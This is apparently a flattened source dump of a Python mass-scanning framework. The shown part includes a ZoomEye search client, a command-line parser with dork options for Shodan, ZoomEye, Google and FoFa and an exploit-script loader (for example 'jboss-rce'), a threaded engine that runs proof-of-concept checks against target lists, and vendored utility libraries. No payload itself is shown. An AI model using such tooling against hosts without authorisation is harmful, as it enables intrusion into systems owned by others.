jBc/lDb+XbDABHcTuPQV1T84zJQ6VdCsmPW6AF/ghhmBeC8owH7TzEIK9a5QoNE+ 68 | xqFx7D+gIIxmOom0jtTYsU0lR+4viMi14QVFwL4Ucd56/Y57fU0IlqUSc/Atyjcn 69 | dBInTMu2l+nZrghtWjlA3QVHdWpaIbOjGM9O9y5Xt5hwXsjEeLBi 70 | -----END CERTIFICATE----- 71 | -------------------------------------------------------------------------------- /thirdparty/colorama/win32.py: -------------------------------------------------------------------------------- 1 | 2 | # from winbase.h 3 | STDOUT = -11 4 | STDERR = -12 5 | 6 | try: 7 | from ctypes import windll 8 | except ImportError: 9 | windll = None 10 | SetConsoleTextAttribute = lambda *_: None 11 | else: 12 | from ctypes import ( 13 | byref, Structure, c_char, c_short, c_uint32, c_ushort 14 | ) 15 | 16 | handles = { 17 | STDOUT: windll.kernel32.GetStdHandle(STDOUT), 18 | STDERR: windll.kernel32.GetStdHandle(STDERR), 19 | } 20 | 21 | SHORT = c_short 22 | WORD = c_ushort 23 | DWORD = c_uint32 24 | TCHAR = c_char 25 | 26 | class COORD(Structure): 27 | """struct in wincon.h""" 28 | _fields_ = [ 29 | ('X', SHORT), 30 | ('Y', SHORT), 31 | ] 32 | 33 | class SMALL_RECT(Structure): 34 | """struct in wincon.h.""" 35 | _fields_ = [ 36 | ("Left", SHORT), 37 | ("Top", SHORT), 38 | ("Right", SHORT), 39 | ("Bottom", SHORT), 40 | ] 41 | 42 | class CONSOLE_SCREEN_BUFFER_INFO(Structure): 43 | """struct in wincon.h.""" 44 | _fields_ = [ 45 | ("dwSize", COORD), 46 | ("dwCursorPosition", COORD), 47 | ("wAttributes", WORD), 48 | ("srWindow", SMALL_RECT), 49 | ("dwMaximumWindowSize", COORD), 50 | ] 51 | def __str__(self): 52 | return '(%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d)' % ( 53 | self.dwSize.Y, self.dwSize.X 54 | , self.dwCursorPosition.Y, self.dwCursorPosition.X 55 | , self.wAttributes 56 | , self.srWindow.Top, self.srWindow.Left, self.srWindow.Bottom, self.srWindow.Right 57 | , self.dwMaximumWindowSize.Y, self.dwMaximumWindowSize.X 58 | ) 59 | 60 | def GetConsoleScreenBufferInfo(stream_id=STDOUT): 61 | handle = handles[stream_id] 62 | csbi = CONSOLE_SCREEN_BUFFER_INFO() 63 | success = windll.kernel32.GetConsoleScreenBufferInfo( 64 | handle, byref(csbi)) 65 | return csbi 66 | 67 | 68 | def SetConsoleTextAttribute(stream_id, attrs): 69 | handle = handles[stream_id] 70 | return windll.kernel32.SetConsoleTextAttribute(handle, attrs) 71 | 72 | 73 | def SetConsoleCursorPosition(stream_id, position): 74 | position = COORD(*position) 75 | # If the position is out of range, do nothing. 76 | if position.Y <= 0 or position.X <= 0: 77 | return 78 | # Adjust for Windows' SetConsoleCursorPosition: 79 | # 1. being 0-based, while ANSI is 1-based. 80 | # 2. expecting (x,y), while ANSI uses (y,x). 81 | adjusted_position = COORD(position.Y - 1, position.X - 1) 82 | # Adjust for viewport's scroll position 83 | sr = GetConsoleScreenBufferInfo(STDOUT).srWindow 84 | adjusted_position.Y += sr.Top 85 | adjusted_position.X += sr.Left 86 | # Resume normal processing 87 | handle = handles[stream_id] 88 | return windll.kernel32.SetConsoleCursorPosition(handle, adjusted_position) 89 | 90 | def FillConsoleOutputCharacter(stream_id, char, length, start): 91 | handle = handles[stream_id] 92 | char = TCHAR(char) 93 | length = DWORD(length) 94 | num_written = DWORD(0) 95 | # Note that this is hard-coded for ANSI (vs wide) bytes. 96 | success = windll.kernel32.FillConsoleOutputCharacterA( 97 | handle, char, length, start, byref(num_written)) 98 | return num_written.value 99 | 100 | def FillConsoleOutputAttribute(stream_id, attr, length, start): 101 | ''' FillConsoleOutputAttribute( hConsole, csbi.wAttributes, dwConSize, coordScreen, &cCharsWritten )''' 102 | handle = handles[stream_id] 103 | attribute = WORD(attr) 104 | length = DWORD(length) 105 | num_written = DWORD(0) 106 | # Note that this is hard-coded for ANSI (vs wide) bytes. 107 | return windll.kernel32.FillConsoleOutputAttribute( 108 | handle, attribute, length, start, byref(num_written)) 109 | 110 | -------------------------------------------------------------------------------- /thirdparty/colorama/winterm.py: -------------------------------------------------------------------------------- 1 | 2 | from . import win32 3 | 4 | 5 | # from wincon.h 6 | class WinColor(object): 7 | BLACK = 0 8 | BLUE = 1 9 | GREEN = 2 10 | CYAN = 3 11 | RED = 4 12 | MAGENTA = 5 13 | YELLOW = 6 14 | GREY = 7 15 | 16 | # from wincon.h 17 | class WinStyle(object): 18 | NORMAL = 0x00 # dim text, dim background 19 | BRIGHT = 0x08 # bright text, dim background 20 | 21 | 22 | class WinTerm(object): 23 | 24 | def __init__(self): 25 | self._default = win32.GetConsoleScreenBufferInfo(win32.STDOUT).wAttributes 26 | self.set_attrs(self._default) 27 | self._default_fore = self._fore 28 | self._default_back = self._back 29 | self._default_style = self._style 30 | 31 | def get_attrs(self): 32 | return self._fore + self._back * 16 + self._style 33 | 34 | def set_attrs(self, value): 35 | self._fore = value & 7 36 | self._back = (value >> 4) & 7 37 | self._style = value & WinStyle.BRIGHT 38 | 39 | def reset_all(self, on_stderr=None): 40 | self.set_attrs(self._default) 41 | self.set_console(attrs=self._default) 42 | 43 | def fore(self, fore=None, on_stderr=False): 44 | if fore is None: 45 | fore = self._default_fore 46 | self._fore = fore 47 | self.set_console(on_stderr=on_stderr) 48 | 49 | def back(self, back=None, on_stderr=False): 50 | if back is None: 51 | back = self._default_back 52 | self._back = back 53 | self.set_console(on_stderr=on_stderr) 54 | 55 | def style(self, style=None, on_stderr=False): 56 | if style is None: 57 | style = self._default_style 58 | self._style = style 59 | self.set_console(on_stderr=on_stderr) 60 | 61 | def set_console(self, attrs=None, on_stderr=False): 62 | if attrs is None: 63 | attrs = self.get_attrs() 64 | handle = win32.STDOUT 65 | if on_stderr: 66 | handle = win32.STDERR 67 | win32.SetConsoleTextAttribute(handle, attrs) 68 | 69 | def get_position(self, handle): 70 | position = win32.GetConsoleScreenBufferInfo(handle).dwCursorPosition 71 | # Because Windows coordinates are 0-based, 72 | # and win32.SetConsoleCursorPosition expects 1-based. 73 | position.X += 1 74 | position.Y += 1 75 | return position 76 | 77 | def set_cursor_position(self, position=None, on_stderr=False): 78 | if position is None: 79 | #I'm not currently tracking the position, so there is no default. 80 | #position = self.get_position() 81 | return 82 | handle = win32.STDOUT 83 | if on_stderr: 84 | handle = win32.STDERR 85 | win32.SetConsoleCursorPosition(handle, position) 86 | 87 | def cursor_up(self, num_rows=0, on_stderr=False): 88 | if num_rows == 0: 89 | return 90 | handle = win32.STDOUT 91 | if on_stderr: 92 | handle = win32.STDERR 93 | position = self.get_position(handle) 94 | adjusted_position = (position.Y - num_rows, position.X) 95 | self.set_cursor_position(adjusted_position, on_stderr) 96 | 97 | def erase_data(self, mode=0, on_stderr=False): 98 | # 0 (or None) should clear from the cursor to the end of the screen. 99 | # 1 should clear from the cursor to the beginning of the screen. 100 | # 2 should clear the entire screen. (And maybe move cursor to (1,1)?) 101 | # 102 | # At the moment, I only support mode 2. From looking at the API, it 103 | # should be possible to calculate a different number of bytes to clear, 104 | # and to do so relative to the cursor position. 105 | if mode[0] not in (2,): 106 | return 107 | handle = win32.STDOUT 108 | if on_stderr: 109 | handle = win32.STDERR 110 | # here's where we'll home the cursor 111 | coord_screen = win32.COORD(0,0) 112 | csbi = win32.GetConsoleScreenBufferInfo(handle) 113 | # get the number of character cells in the current buffer 114 | dw_con_size = csbi.dwSize.X * csbi.dwSize.Y 115 | # fill the entire screen with blanks 116 | win32.FillConsoleOutputCharacter(handle, ord(' '), dw_con_size, coord_screen) 117 | # now set the buffer's attributes accordingly 118 | win32.FillConsoleOutputAttribute(handle, self.get_attrs(), dw_con_size, coord_screen ); 119 | # put the cursor at (0, 0) 120 | win32.SetConsoleCursorPosition(handle, (coord_screen.X, coord_screen.Y)) 121 | -------------------------------------------------------------------------------- /thirdparty/httplib2/iri2uri.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """Converts an IRI to a URI.""" 3 | 4 | __author__ = "Joe Gregorio (joe@bitworking.org)" 5 | __copyright__ = "Copyright 2006, Joe Gregorio" 6 | __contributors__ = [] 7 | __version__ = "1.0.0" 8 | __license__ = "MIT" 9 | 10 | import urllib.parse 11 | 12 | # Convert an IRI to a URI following the rules in RFC 3987 13 | # 14 | # The characters we need to enocde and escape are defined in the spec: 15 | # 16 | # iprivate = %xE000-F8FF / %xF0000-FFFFD / %x100000-10FFFD 17 | # ucschar = %xA0-D7FF / %xF900-FDCF / %xFDF0-FFEF 18 | # / %x10000-1FFFD / %x20000-2FFFD / %x30000-3FFFD 19 | # / %x40000-4FFFD / %x50000-5FFFD / %x60000-6FFFD 20 | # / %x70000-7FFFD / %x80000-8FFFD / %x90000-9FFFD 21 | # / %xA0000-AFFFD / %xB0000-BFFFD / %xC0000-CFFFD 22 | # / %xD0000-DFFFD / %xE1000-EFFFD 23 | 24 | escape_range = [ 25 | (0xA0, 0xD7FF), 26 | (0xE000, 0xF8FF), 27 | (0xF900, 0xFDCF), 28 | (0xFDF0, 0xFFEF), 29 | (0x10000, 0x1FFFD), 30 | (0x20000, 0x2FFFD), 31 | (0x30000, 0x3FFFD), 32 | (0x40000, 0x4FFFD), 33 | (0x50000, 0x5FFFD), 34 | (0x60000, 0x6FFFD), 35 | (0x70000, 0x7FFFD), 36 | (0x80000, 0x8FFFD), 37 | (0x90000, 0x9FFFD), 38 | (0xA0000, 0xAFFFD), 39 | (0xB0000, 0xBFFFD), 40 | (0xC0000, 0xCFFFD), 41 | (0xD0000, 0xDFFFD), 42 | (0xE1000, 0xEFFFD), 43 | (0xF0000, 0xFFFFD), 44 | (0x100000, 0x10FFFD), 45 | ] 46 | 47 | 48 | def encode(c): 49 | retval = c 50 | i = ord(c) 51 | for low, high in escape_range: 52 | if i < low: 53 | break 54 | if i >= low and i <= high: 55 | retval = "".join(["%%%2X" % o for o in c.encode("utf-8")]) 56 | break 57 | return retval 58 | 59 | 60 | def iri2uri(uri): 61 | """Convert an IRI to a URI. Note that IRIs must be 62 | passed in a unicode strings. That is, do not utf-8 encode 63 | the IRI before passing it into the function.""" 64 | if isinstance(uri, str): 65 | (scheme, authority, path, query, fragment) = urllib.parse.urlsplit(uri) 66 | authority = authority.encode("idna").decode("utf-8") 67 | # For each character in 'ucschar' or 'iprivate' 68 | # 1. encode as utf-8 69 | # 2. then %-encode each octet of that utf-8 70 | uri = urllib.parse.urlunsplit((scheme, authority, path, query, fragment)) 71 | uri = "".join([encode(c) for c in uri]) 72 | return uri 73 | 74 | 75 | if __name__ == "__main__": 76 | import unittest 77 | 78 | class Test(unittest.TestCase): 79 | def test_uris(self): 80 | """Test that URIs are invariant under the transformation.""" 81 | invariant = [ 82 | "ftp://ftp.is.co.za/rfc/rfc1808.txt", 83 | "http://www.ietf.org/rfc/rfc2396.txt", 84 | "ldap://[2001:db8::7]/c=GB?objectClass?one", 85 | "mailto:John.Doe@example.com", 86 | "news:comp.infosystems.www.servers.unix", 87 | "tel:+1-816-555-1212", 88 | "telnet://192.0.2.16:80/", 89 | "urn:oasis:names:specification:docbook:dtd:xml:4.1.2", 90 | ] 91 | for uri in invariant: 92 | self.assertEqual(uri, iri2uri(uri)) 93 | 94 | def test_iri(self): 95 | """Test that the right type of escaping is done for each part of the URI.""" 96 | self.assertEqual( 97 | "http://xn--o3h.com/%E2%98%84", 98 | iri2uri("http://\N{COMET}.com/\N{COMET}"), 99 | ) 100 | self.assertEqual( 101 | "http://bitworking.org/?fred=%E2%98%84", 102 | iri2uri("http://bitworking.org/?fred=\N{COMET}"), 103 | ) 104 | self.assertEqual( 105 | "http://bitworking.org/#%E2%98%84", 106 | iri2uri("http://bitworking.org/#\N{COMET}"), 107 | ) 108 | self.assertEqual("#%E2%98%84", iri2uri("#\N{COMET}")) 109 | self.assertEqual( 110 | "/fred?bar=%E2%98%9A#%E2%98%84", 111 | iri2uri("/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}"), 112 | ) 113 | self.assertEqual( 114 | "/fred?bar=%E2%98%9A#%E2%98%84", 115 | iri2uri(iri2uri("/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}")), 116 | ) 117 | self.assertNotEqual( 118 | "/fred?bar=%E2%98%9A#%E2%98%84", 119 | iri2uri( 120 | "/fred?bar=\N{BLACK LEFT POINTING INDEX}#\N{COMET}".encode("utf-8") 121 | ), 122 | ) 123 | 124 | unittest.main() 125 | -------------------------------------------------------------------------------- /lib/api/zoomeye/base.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | # project = https://github.com/Xyntax/POC-T 4 | # author = i@cdxy.me 5 | 6 | import requests 7 | import getpass 8 | import sys 9 | from lib.core.data import logger, paths 10 | from lib.utils.config import ConfigFileParser 11 | 12 | 13 | class ZoomEye(object): 14 | def __init__(self, username=None, password=None): 15 | self.username = username 16 | self.password = password 17 | 18 | self.token = '' 19 | self.zoomeye_login_api = "https://api.zoomeye.org/user/login" 20 | self.zoomeye_dork_api = "https://api.zoomeye.org/{}/search" 21 | 22 | def auto_login(self): 23 | msg = 'Trying to login with credentials in config file: %s.' % paths.CONFIG_PATH 24 | logger.info(msg) 25 | try: 26 | self.username = ConfigFileParser().ZoomEyeEmail() 27 | self.password = ConfigFileParser().ZoomEyePassword() 28 | except: 29 | pass 30 | 31 | if bool(self.username and self.password): 32 | if self.get_token(): 33 | return 34 | 35 | msg = 'Automatic authorization failed.' 36 | logger.warning(msg) 37 | self.manual_login() 38 | 39 | def manual_login(self): 40 | msg = 'Please input your ZoomEye Email and Password below.' 41 | logger.info(msg) 42 | self.username = raw_input('ZoomEye Username(Email): ').strip() 43 | self.password = getpass.getpass(prompt='ZoomEye Password: ').strip() 44 | if not self.get_token(): 45 | msg = 'Invalid ZoomEye username or password.' 46 | sys.exit(logger.error(msg)) 47 | 48 | def get_token(self): 49 | # Please access https://www.zoomeye.org/api/doc#login 50 | data = '{{"username": "{}", "password": "{}"}}'.format(self.username, 51 | self.password) 52 | resp = requests.post(self.zoomeye_login_api, data=data) 53 | if resp and resp.status_code == 200 and 'access_token' in resp.json(): 54 | self.token = resp.json().get('access_token') 55 | return self.token 56 | return False 57 | 58 | def setToken(self, token): 59 | """set Token from exist token string""" 60 | self.token = token.strip() 61 | 62 | def dork_search(self, dork, page=0, resource='web', facet=['ip']): 63 | """Search records with ZoomEye dorks. 64 | 65 | param: dork 66 | ex: country:cn 67 | access https://www.zoomeye.org/search/dorks for more details. 68 | param: page 69 | total page(s) number 70 | param: resource 71 | set a search resource type, ex: [web, host] 72 | param: facet 73 | ex: [app, device] 74 | A comma-separated list of properties to get summary information 75 | """ 76 | result = [] 77 | if isinstance(facet, (tuple, list)): 78 | facet = ','.join(facet) 79 | 80 | zoomeye_api = self.zoomeye_dork_api.format(resource) 81 | headers = {'Authorization': 'JWT %s' % self.token} 82 | params = {'query': dork, 'page': page + 1, 'facet': facet} 83 | resp = requests.get(zoomeye_api, params=params, headers=headers) 84 | if resp and resp.status_code == 200 and 'matches' in resp.json(): 85 | matches = resp.json().get('matches') 86 | # total = resp.json().get('total') # all matches items num 87 | result = matches 88 | 89 | # Every match item incudes the following information: 90 | # geoinfo 91 | # description 92 | # check_time 93 | # title 94 | # ip 95 | # site 96 | # system 97 | # headers 98 | # keywords 99 | # server 100 | # domains 101 | 102 | return result 103 | 104 | def resources_info(self): 105 | """Resource info shows us available search times. 106 | 107 | host-search: total number of available host records to search 108 | web-search: total number of available web records to search 109 | """ 110 | data = None 111 | zoomeye_api = "https://api.zoomeye.org/resources-info" 112 | headers = {'Authorization': 'JWT %s' % self.token} 113 | resp = requests.get(zoomeye_api, headers=headers) 114 | if resp and resp.status_code == 200 and 'plan' in resp.json(): 115 | data = resp.json() 116 | 117 | return data 118 | 119 | 120 | def show_site_ip(data): 121 | if data: 122 | for i in data: 123 | print(i.get('site'), i.get('ip')) 124 | 125 | 126 | def show_ip_port(data): 127 | if data: 128 | for i in data: 129 | print(i.get('ip'), i.get('portinfo').get('port')) 130 | -------------------------------------------------------------------------------- /lib/parse/cmdline.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | # -*- coding: utf-8 -*- 3 | # author = syst1m 4 | 5 | import argparse 6 | import sys 7 | from lib.core.settings import VERSION 8 | 9 | 10 | def cmdLineParser(): 11 | parser = argparse.ArgumentParser(description='powered by syst1m ', 12 | usage='python3 Bayonet.py -s bingc -aZ "port:8080"', 13 | add_help=False) 14 | 15 | engine = parser.add_argument_group('ENGINE') 16 | engine.add_argument('-eT', dest="engine_thread", default=False, action='store_true', 17 | help='Multi-Threaded engine (default choice)') 18 | 19 | engine.add_argument('-eG', dest="engine_gevent", default=False, action='store_true', 20 | help='Gevent engine (single-threaded with asynchronous)') 21 | 22 | engine.add_argument('-t', metavar='NUM', dest="thread_num", type=int, default=10, 23 | help='num of threads/concurrent, 10 by default') 24 | 25 | script = parser.add_argument_group('SCRIPT') 26 | 27 | script.add_argument('-s', metavar='NAME', dest="script_name", type=str, default='', 28 | help='load script by name (-s jboss-rce) or path (-s ./script/jboss.py)') 29 | 30 | target = parser.add_argument_group('TARGET') 31 | 32 | target.add_argument('-iS', metavar='TARGET', dest="target_single", type=str, default='', 33 | help="scan a single target (e.g. www.wooyun.org)") 34 | target.add_argument('-iF', metavar='FILE', dest="target_file", type=str, default='', 35 | help='load targets from targetFile (e.g. ./data/wooyun_domain)') 36 | target.add_argument('-iA', metavar='START-END', dest="target_array", type=str, default='', 37 | help='generate array from int(start) to int(end) (e.g. 1-100)') 38 | target.add_argument('-iN', metavar='IP/MASK', dest="target_network", type=str, default='', 39 | help='generate IP from IP/MASK. (e.g. 127.0.0.0/24)') 40 | 41 | api = parser.add_argument_group('API') 42 | api.add_argument('-aZ', '--zoomeye', metavar='DORK', dest="zoomeye_dork", type=str, default='', 43 | help='ZoomEye dork (e.g. "zabbix port:8080")') 44 | api.add_argument('-aS', '--shodan', metavar='DORK', dest="shodan_dork", type=str, default='', 45 | help='Shodan dork.') 46 | api.add_argument('-aG', '--google', metavar='DORK', dest="google_dork", type=str, default='', 47 | help='Google dork (e.g. "inurl:admin.php")') 48 | api.add_argument('-aF', '--fofa', metavar='DORK', dest="fofa_dork", type=str, default='', 49 | help='FoFa dork (e.g. "banner=users && protocol=ftp")') 50 | api.add_argument('--limit', metavar='NUM', dest="api_limit", type=int, default=10, 51 | help='Maximum searching results (default:10)') 52 | api.add_argument('--offset', metavar='OFFSET', dest="api_offset", type=int, default=0, 53 | help="Search offset to begin getting results from (default:0)") 54 | api.add_argument('--search-type', metavar='TYPE', dest="search_type", action="store", default='host', 55 | help="[ZoomEye] search type used in ZoomEye API, web or host (default:host)") 56 | api.add_argument('--gproxy', metavar='PROXY', dest="google_proxy", action="store", default=None, 57 | help="[Google] Use proxy for Google (e.g. \"sock5 127.0.0.1 7070\" or \"http 127.0.0.1 1894\"") 58 | 59 | output = parser.add_argument_group('OUTPUT') 60 | 61 | output.add_argument('-o', metavar='FILE', dest="output_path", type=str, default='', 62 | help='output file path&name. default in ./output/') 63 | output.add_argument('-oF', '--no-file', dest="output_file_status", default=True, action='store_false', 64 | help='disable file output') 65 | output.add_argument('-oS', '--no-screen', dest="output_screen_status", default=True, action='store_false', 66 | help='disable screen output') 67 | 68 | misc = parser.add_argument_group('MISC') 69 | 70 | misc.add_argument('--single', dest="single_mode", default=False, action='store_true', 71 | help='exit after finding the first victim/password.') 72 | misc.add_argument('--show', dest="show_scripts", default=False, action='store_true', 73 | help='show available script names in ./script/ and exit') 74 | misc.add_argument('--browser', dest="open_browser", default=False, action='store_true', 75 | help='Open notepad or web browser to view report after task finished.') 76 | 77 | system = parser.add_argument_group('SYSTEM') 78 | 79 | system.add_argument('-v', '--version', action='version', version=VERSION, 80 | help="show program's version number and exit") 81 | system.add_argument('-h', '--help', action='help', 82 | help='show this help message and exit') 83 | 84 | if len(sys.argv) == 1: 85 | sys.argv.append('-h') 86 | args = parser.parse_args() 87 | return args -------------------------------------------------------------------------------- /lib/controller/engine.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | #! *-* coding:utf8 -*- 3 | # author syst1m 4 | 5 | 6 | """ 7 | 引擎 8 | """ 9 | 10 | import threading 11 | import time 12 | import traceback 13 | from lib.core.data import th, conf, logger 14 | from lib.core.common import dataToStdout 15 | from lib.utils.console import getTerminalSize 16 | from lib.utils.versioncheck import PYVERSION 17 | from lib.core.enums import POC_RESULT_STATUS, ENGINE_MODE_STATUS 18 | 19 | 20 | def initEngine(): 21 | th.thread_mode = True if conf.ENGINE is ENGINE_MODE_STATUS.THREAD else False 22 | th.module_name = conf.MODULE_NAME 23 | th.f_flag = conf.FILE_OUTPUT 24 | th.s_flag = conf.SCREEN_OUTPUT 25 | th.output = conf.OUTPUT_FILE_PATH 26 | th.thread_count = th.threads_num = th.THREADS_NUM 27 | th.single_mode = conf.SINGLE_MODE 28 | th.scan_count = th.found_count = 0 29 | th.console_width = getTerminalSize()[0] - 2 30 | th.is_continue = True 31 | th.found_single = False 32 | th.start_time = time.time() 33 | setThreadLock() 34 | msg = 'Set the number of concurrent: %d' % th.threads_num 35 | logger.success(msg) 36 | 37 | 38 | def singleMode(): 39 | th.is_continue = False 40 | th.found_single = True 41 | 42 | 43 | def scan(): 44 | while 1: 45 | if th.thread_mode: th.load_lock.acquire() 46 | if th.queue.qsize() > 0 and th.is_continue: 47 | payload = str(th.queue.get(timeout=1.0)) 48 | if th.thread_mode: th.load_lock.release() 49 | else: 50 | if th.thread_mode: th.load_lock.release() 51 | break 52 | try: 53 | # POC在执行时报错如果不被处理,线程框架会停止并退出 54 | status = th.module_obj.poc(payload) 55 | resultHandler(status, payload) 56 | except Exception: 57 | th.errmsg = traceback.format_exc() 58 | th.is_continue = False 59 | changeScanCount(1) 60 | if th.s_flag: 61 | printProgress() 62 | if th.s_flag: 63 | printProgress() 64 | 65 | changeThreadCount(-1) 66 | 67 | 68 | def run(): 69 | initEngine() 70 | if conf.ENGINE is ENGINE_MODE_STATUS.THREAD: 71 | for i in range(th.threads_num): 72 | t = threading.Thread(target=scan, name=str(i)) 73 | setThreadDaemon(t) 74 | t.start() 75 | # It can quit with Ctrl-C 76 | while 1: 77 | if th.thread_count > 0 and th.is_continue: 78 | time.sleep(0.01) 79 | else: 80 | break 81 | 82 | elif conf.ENGINE is ENGINE_MODE_STATUS.GEVENT: 83 | from gevent import monkey 84 | monkey.patch_all() 85 | import gevent 86 | while th.queue.qsize() > 0 and th.is_continue: 87 | gevent.joinall([gevent.spawn(scan) for i in xrange(0, th.threads_num) if 88 | th.queue.qsize() > 0]) 89 | 90 | dataToStdout('\n') 91 | 92 | if 'errmsg' in th: 93 | logger.error(th.errmsg) 94 | 95 | if th.found_single: 96 | msg = "[single-mode] found!" 97 | logger.info(msg) 98 | 99 | 100 | def resultHandler(status, payload): 101 | if not status or status is POC_RESULT_STATUS.FAIL: 102 | return 103 | elif status is POC_RESULT_STATUS.RETRAY: 104 | changeScanCount(-1) 105 | th.queue.put(payload) 106 | return 107 | elif status is True or status is POC_RESULT_STATUS.SUCCESS: 108 | msg = payload 109 | else: 110 | msg = str(status) 111 | changeFoundCount(1) 112 | if th.s_flag: 113 | printMessage(msg) 114 | if th.f_flag: 115 | output2file(msg) 116 | if th.single_mode: 117 | singleMode() 118 | 119 | 120 | def setThreadLock(): 121 | if th.thread_mode: 122 | th.found_count_lock = threading.Lock() 123 | th.scan_count_lock = threading.Lock() 124 | th.thread_count_lock = threading.Lock() 125 | th.file_lock = threading.Lock() 126 | th.load_lock = threading.Lock() 127 | 128 | 129 | def setThreadDaemon(thread): 130 | # Reference: http://stackoverflow.com/questions/190010/daemon-threads-explanation 131 | if PYVERSION >= "2.6": 132 | thread.daemon = True 133 | else: 134 | thread.setDaemon(True) 135 | 136 | 137 | def changeFoundCount(num): 138 | if th.thread_mode: th.found_count_lock.acquire() 139 | th.found_count += num 140 | if th.thread_mode: th.found_count_lock.release() 141 | 142 | 143 | def changeScanCount(num): 144 | if th.thread_mode: th.scan_count_lock.acquire() 145 | th.scan_count += num 146 | if th.thread_mode: th.scan_count_lock.release() 147 | 148 | 149 | def changeThreadCount(num): 150 | if th.thread_mode: th.thread_count_lock.acquire() 151 | th.thread_count += num 152 | if th.thread_mode: th.thread_count_lock.release() 153 | 154 | 155 | def printMessage(msg): 156 | dataToStdout('\r' + msg + ' ' * (th.console_width - len(msg)) + '\n\r') 157 | 158 | 159 | def printProgress(): 160 | msg = '%s found | %s remaining | %s scanned in %.2f seconds' % ( 161 | th.found_count, th.queue.qsize(), th.scan_count, time.time() - th.start_time) 162 | out = '\r' + ' ' * (th.console_width - len(msg)) + msg 163 | dataToStdout(out) 164 | 165 | 166 | def output2file(msg): 167 | if th.thread_mode: th.file_lock.acquire() 168 | f = open(th.output, 'a') 169 | f.write(msg + '\n') 170 | f.close() 171 | if th.thread_mode: th.file_lock.release() 172 | 173 | -------------------------------------------------------------------------------- /thirdparty/ansistrm/ansistrm.py: -------------------------------------------------------------------------------- 1 | # 2 | # Copyright (C) 2010-2012 Vinay Sajip. All rights reserved. Licensed under the new BSD license. 3 | # 4 | import ctypes 5 | import logging 6 | import os 7 | 8 | 9 | class ColorizingStreamHandler(logging.StreamHandler): 10 | # color names to indices 11 | color_map = { 12 | 'black': 0, 13 | 'red': 1, 14 | 'green': 2, 15 | 'yellow': 3, 16 | 'blue': 4, 17 | 'magenta': 5, 18 | 'cyan': 6, 19 | 'white': 7, 20 | } 21 | 22 | # levels to (background, foreground, bold/intense) 23 | if os.name == 'nt': 24 | level_map = { 25 | logging.DEBUG: (None, 'blue', True), 26 | logging.INFO: (None, 'white', False), 27 | logging.WARNING: (None, 'yellow', True), 28 | logging.ERROR: (None, 'red', True), 29 | logging.CRITICAL: ('red', 'white', True), 30 | } 31 | else: 32 | level_map = { 33 | logging.DEBUG: (None, 'blue', False), 34 | logging.INFO: (None, 'black', False), 35 | logging.WARNING: (None, 'yellow', False), 36 | logging.ERROR: (None, 'red', False), 37 | logging.CRITICAL: ('red', 'white', True), 38 | } 39 | csi = '\x1b[' 40 | reset = '\x1b[0m' 41 | 42 | @property 43 | def is_tty(self): 44 | isatty = getattr(self.stream, 'isatty', None) 45 | return isatty and isatty() 46 | 47 | def emit(self, record): 48 | try: 49 | message = self.format(record) 50 | stream = self.stream 51 | if not self.is_tty: 52 | stream.write(message) 53 | else: 54 | self.output_colorized(message) 55 | stream.write(getattr(self, 'terminator', '\n')) 56 | self.flush() 57 | except (KeyboardInterrupt, SystemExit): 58 | raise 59 | except: 60 | self.handleError(record) 61 | 62 | if os.name != 'nt': 63 | def output_colorized(self, message): 64 | self.stream.write(message) 65 | else: 66 | import re 67 | ansi_esc = re.compile(r'\x1b\[((?:\d+)(?:;(?:\d+))*)m') 68 | 69 | nt_color_map = { 70 | 0: 0x00, # black 71 | 1: 0x04, # red 72 | 2: 0x02, # green 73 | 3: 0x06, # yellow 74 | 4: 0x01, # blue 75 | 5: 0x05, # magenta 76 | 6: 0x03, # cyan 77 | 7: 0x07, # white 78 | } 79 | 80 | def output_colorized(self, message): 81 | parts = self.ansi_esc.split(message) 82 | write = self.stream.write 83 | h = None 84 | fd = getattr(self.stream, 'fileno', None) 85 | if fd is not None: 86 | fd = fd() 87 | if fd in (1, 2): # stdout or stderr 88 | h = ctypes.windll.kernel32.GetStdHandle(-10 - fd) 89 | while parts: 90 | text = parts.pop(0) 91 | if text: 92 | write(text) 93 | self.stream.flush() 94 | if parts: 95 | params = parts.pop(0) 96 | if h is not None: 97 | params = [int(p) for p in params.split(';')] 98 | color = 0 99 | for p in params: 100 | if 40 <= p <= 47: 101 | color |= self.nt_color_map[p - 40] << 4 102 | elif 30 <= p <= 37: 103 | color |= self.nt_color_map[p - 30] 104 | elif p == 1: 105 | color |= 0x08 # foreground intensity on 106 | elif p == 0: # reset to default color 107 | color = 0x07 108 | else: 109 | pass # error condition ignored 110 | ctypes.windll.kernel32.SetConsoleTextAttribute(h, color) 111 | 112 | def colorize(self, message, record): 113 | if record.levelno in self.level_map: 114 | bg, fg, bold = self.level_map[record.levelno] 115 | params = [] 116 | if bg in self.color_map: 117 | params.append(str(self.color_map[bg] + 40)) 118 | if fg in self.color_map: 119 | params.append(str(self.color_map[fg] + 30)) 120 | if bold: 121 | params.append('1') 122 | if params: 123 | message = ''.join((self.csi, ';'.join(params), 124 | 'm', message, self.reset)) 125 | return message 126 | 127 | def format(self, record): 128 | message = logging.StreamHandler.format(self, record) 129 | if self.is_tty: 130 | # Don't colorize any traceback 131 | parts = message.split('\n', 1) 132 | parts[0] = self.colorize(parts[0], record) 133 | message = '\n'.join(parts) 134 | return message 135 | 136 | 137 | def main(): 138 | root = logging.getLogger() 139 | root.setLevel(logging.DEBUG) 140 | root.addHandler(ColorizingStreamHandler()) 141 | logging.debug('DEBUG') 142 | logging.info('INFO') 143 | logging.warning('WARNING') 144 | logging.error('ERROR') 145 | logging.critical('CRITICAL') 146 | 147 | 148 | if __name__ == '__main__': 149 | main() -------------------------------------------------------------------------------- /thirdparty/termcolor/termcolor.py: -------------------------------------------------------------------------------- 1 | # coding: utf-8 2 | # Copyright (c) 2008-2011 Volvox Development Team 3 | # 4 | # Permission is hereby granted, free of charge, to any person obtaining a copy 5 | # of this software and associated documentation files (the "Software"), to deal 6 | # in the Software without restriction, including without limitation the rights 7 | # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 8 | # copies of the Software, and to permit persons to whom the Software is 9 | # furnished to do so, subject to the following conditions: 10 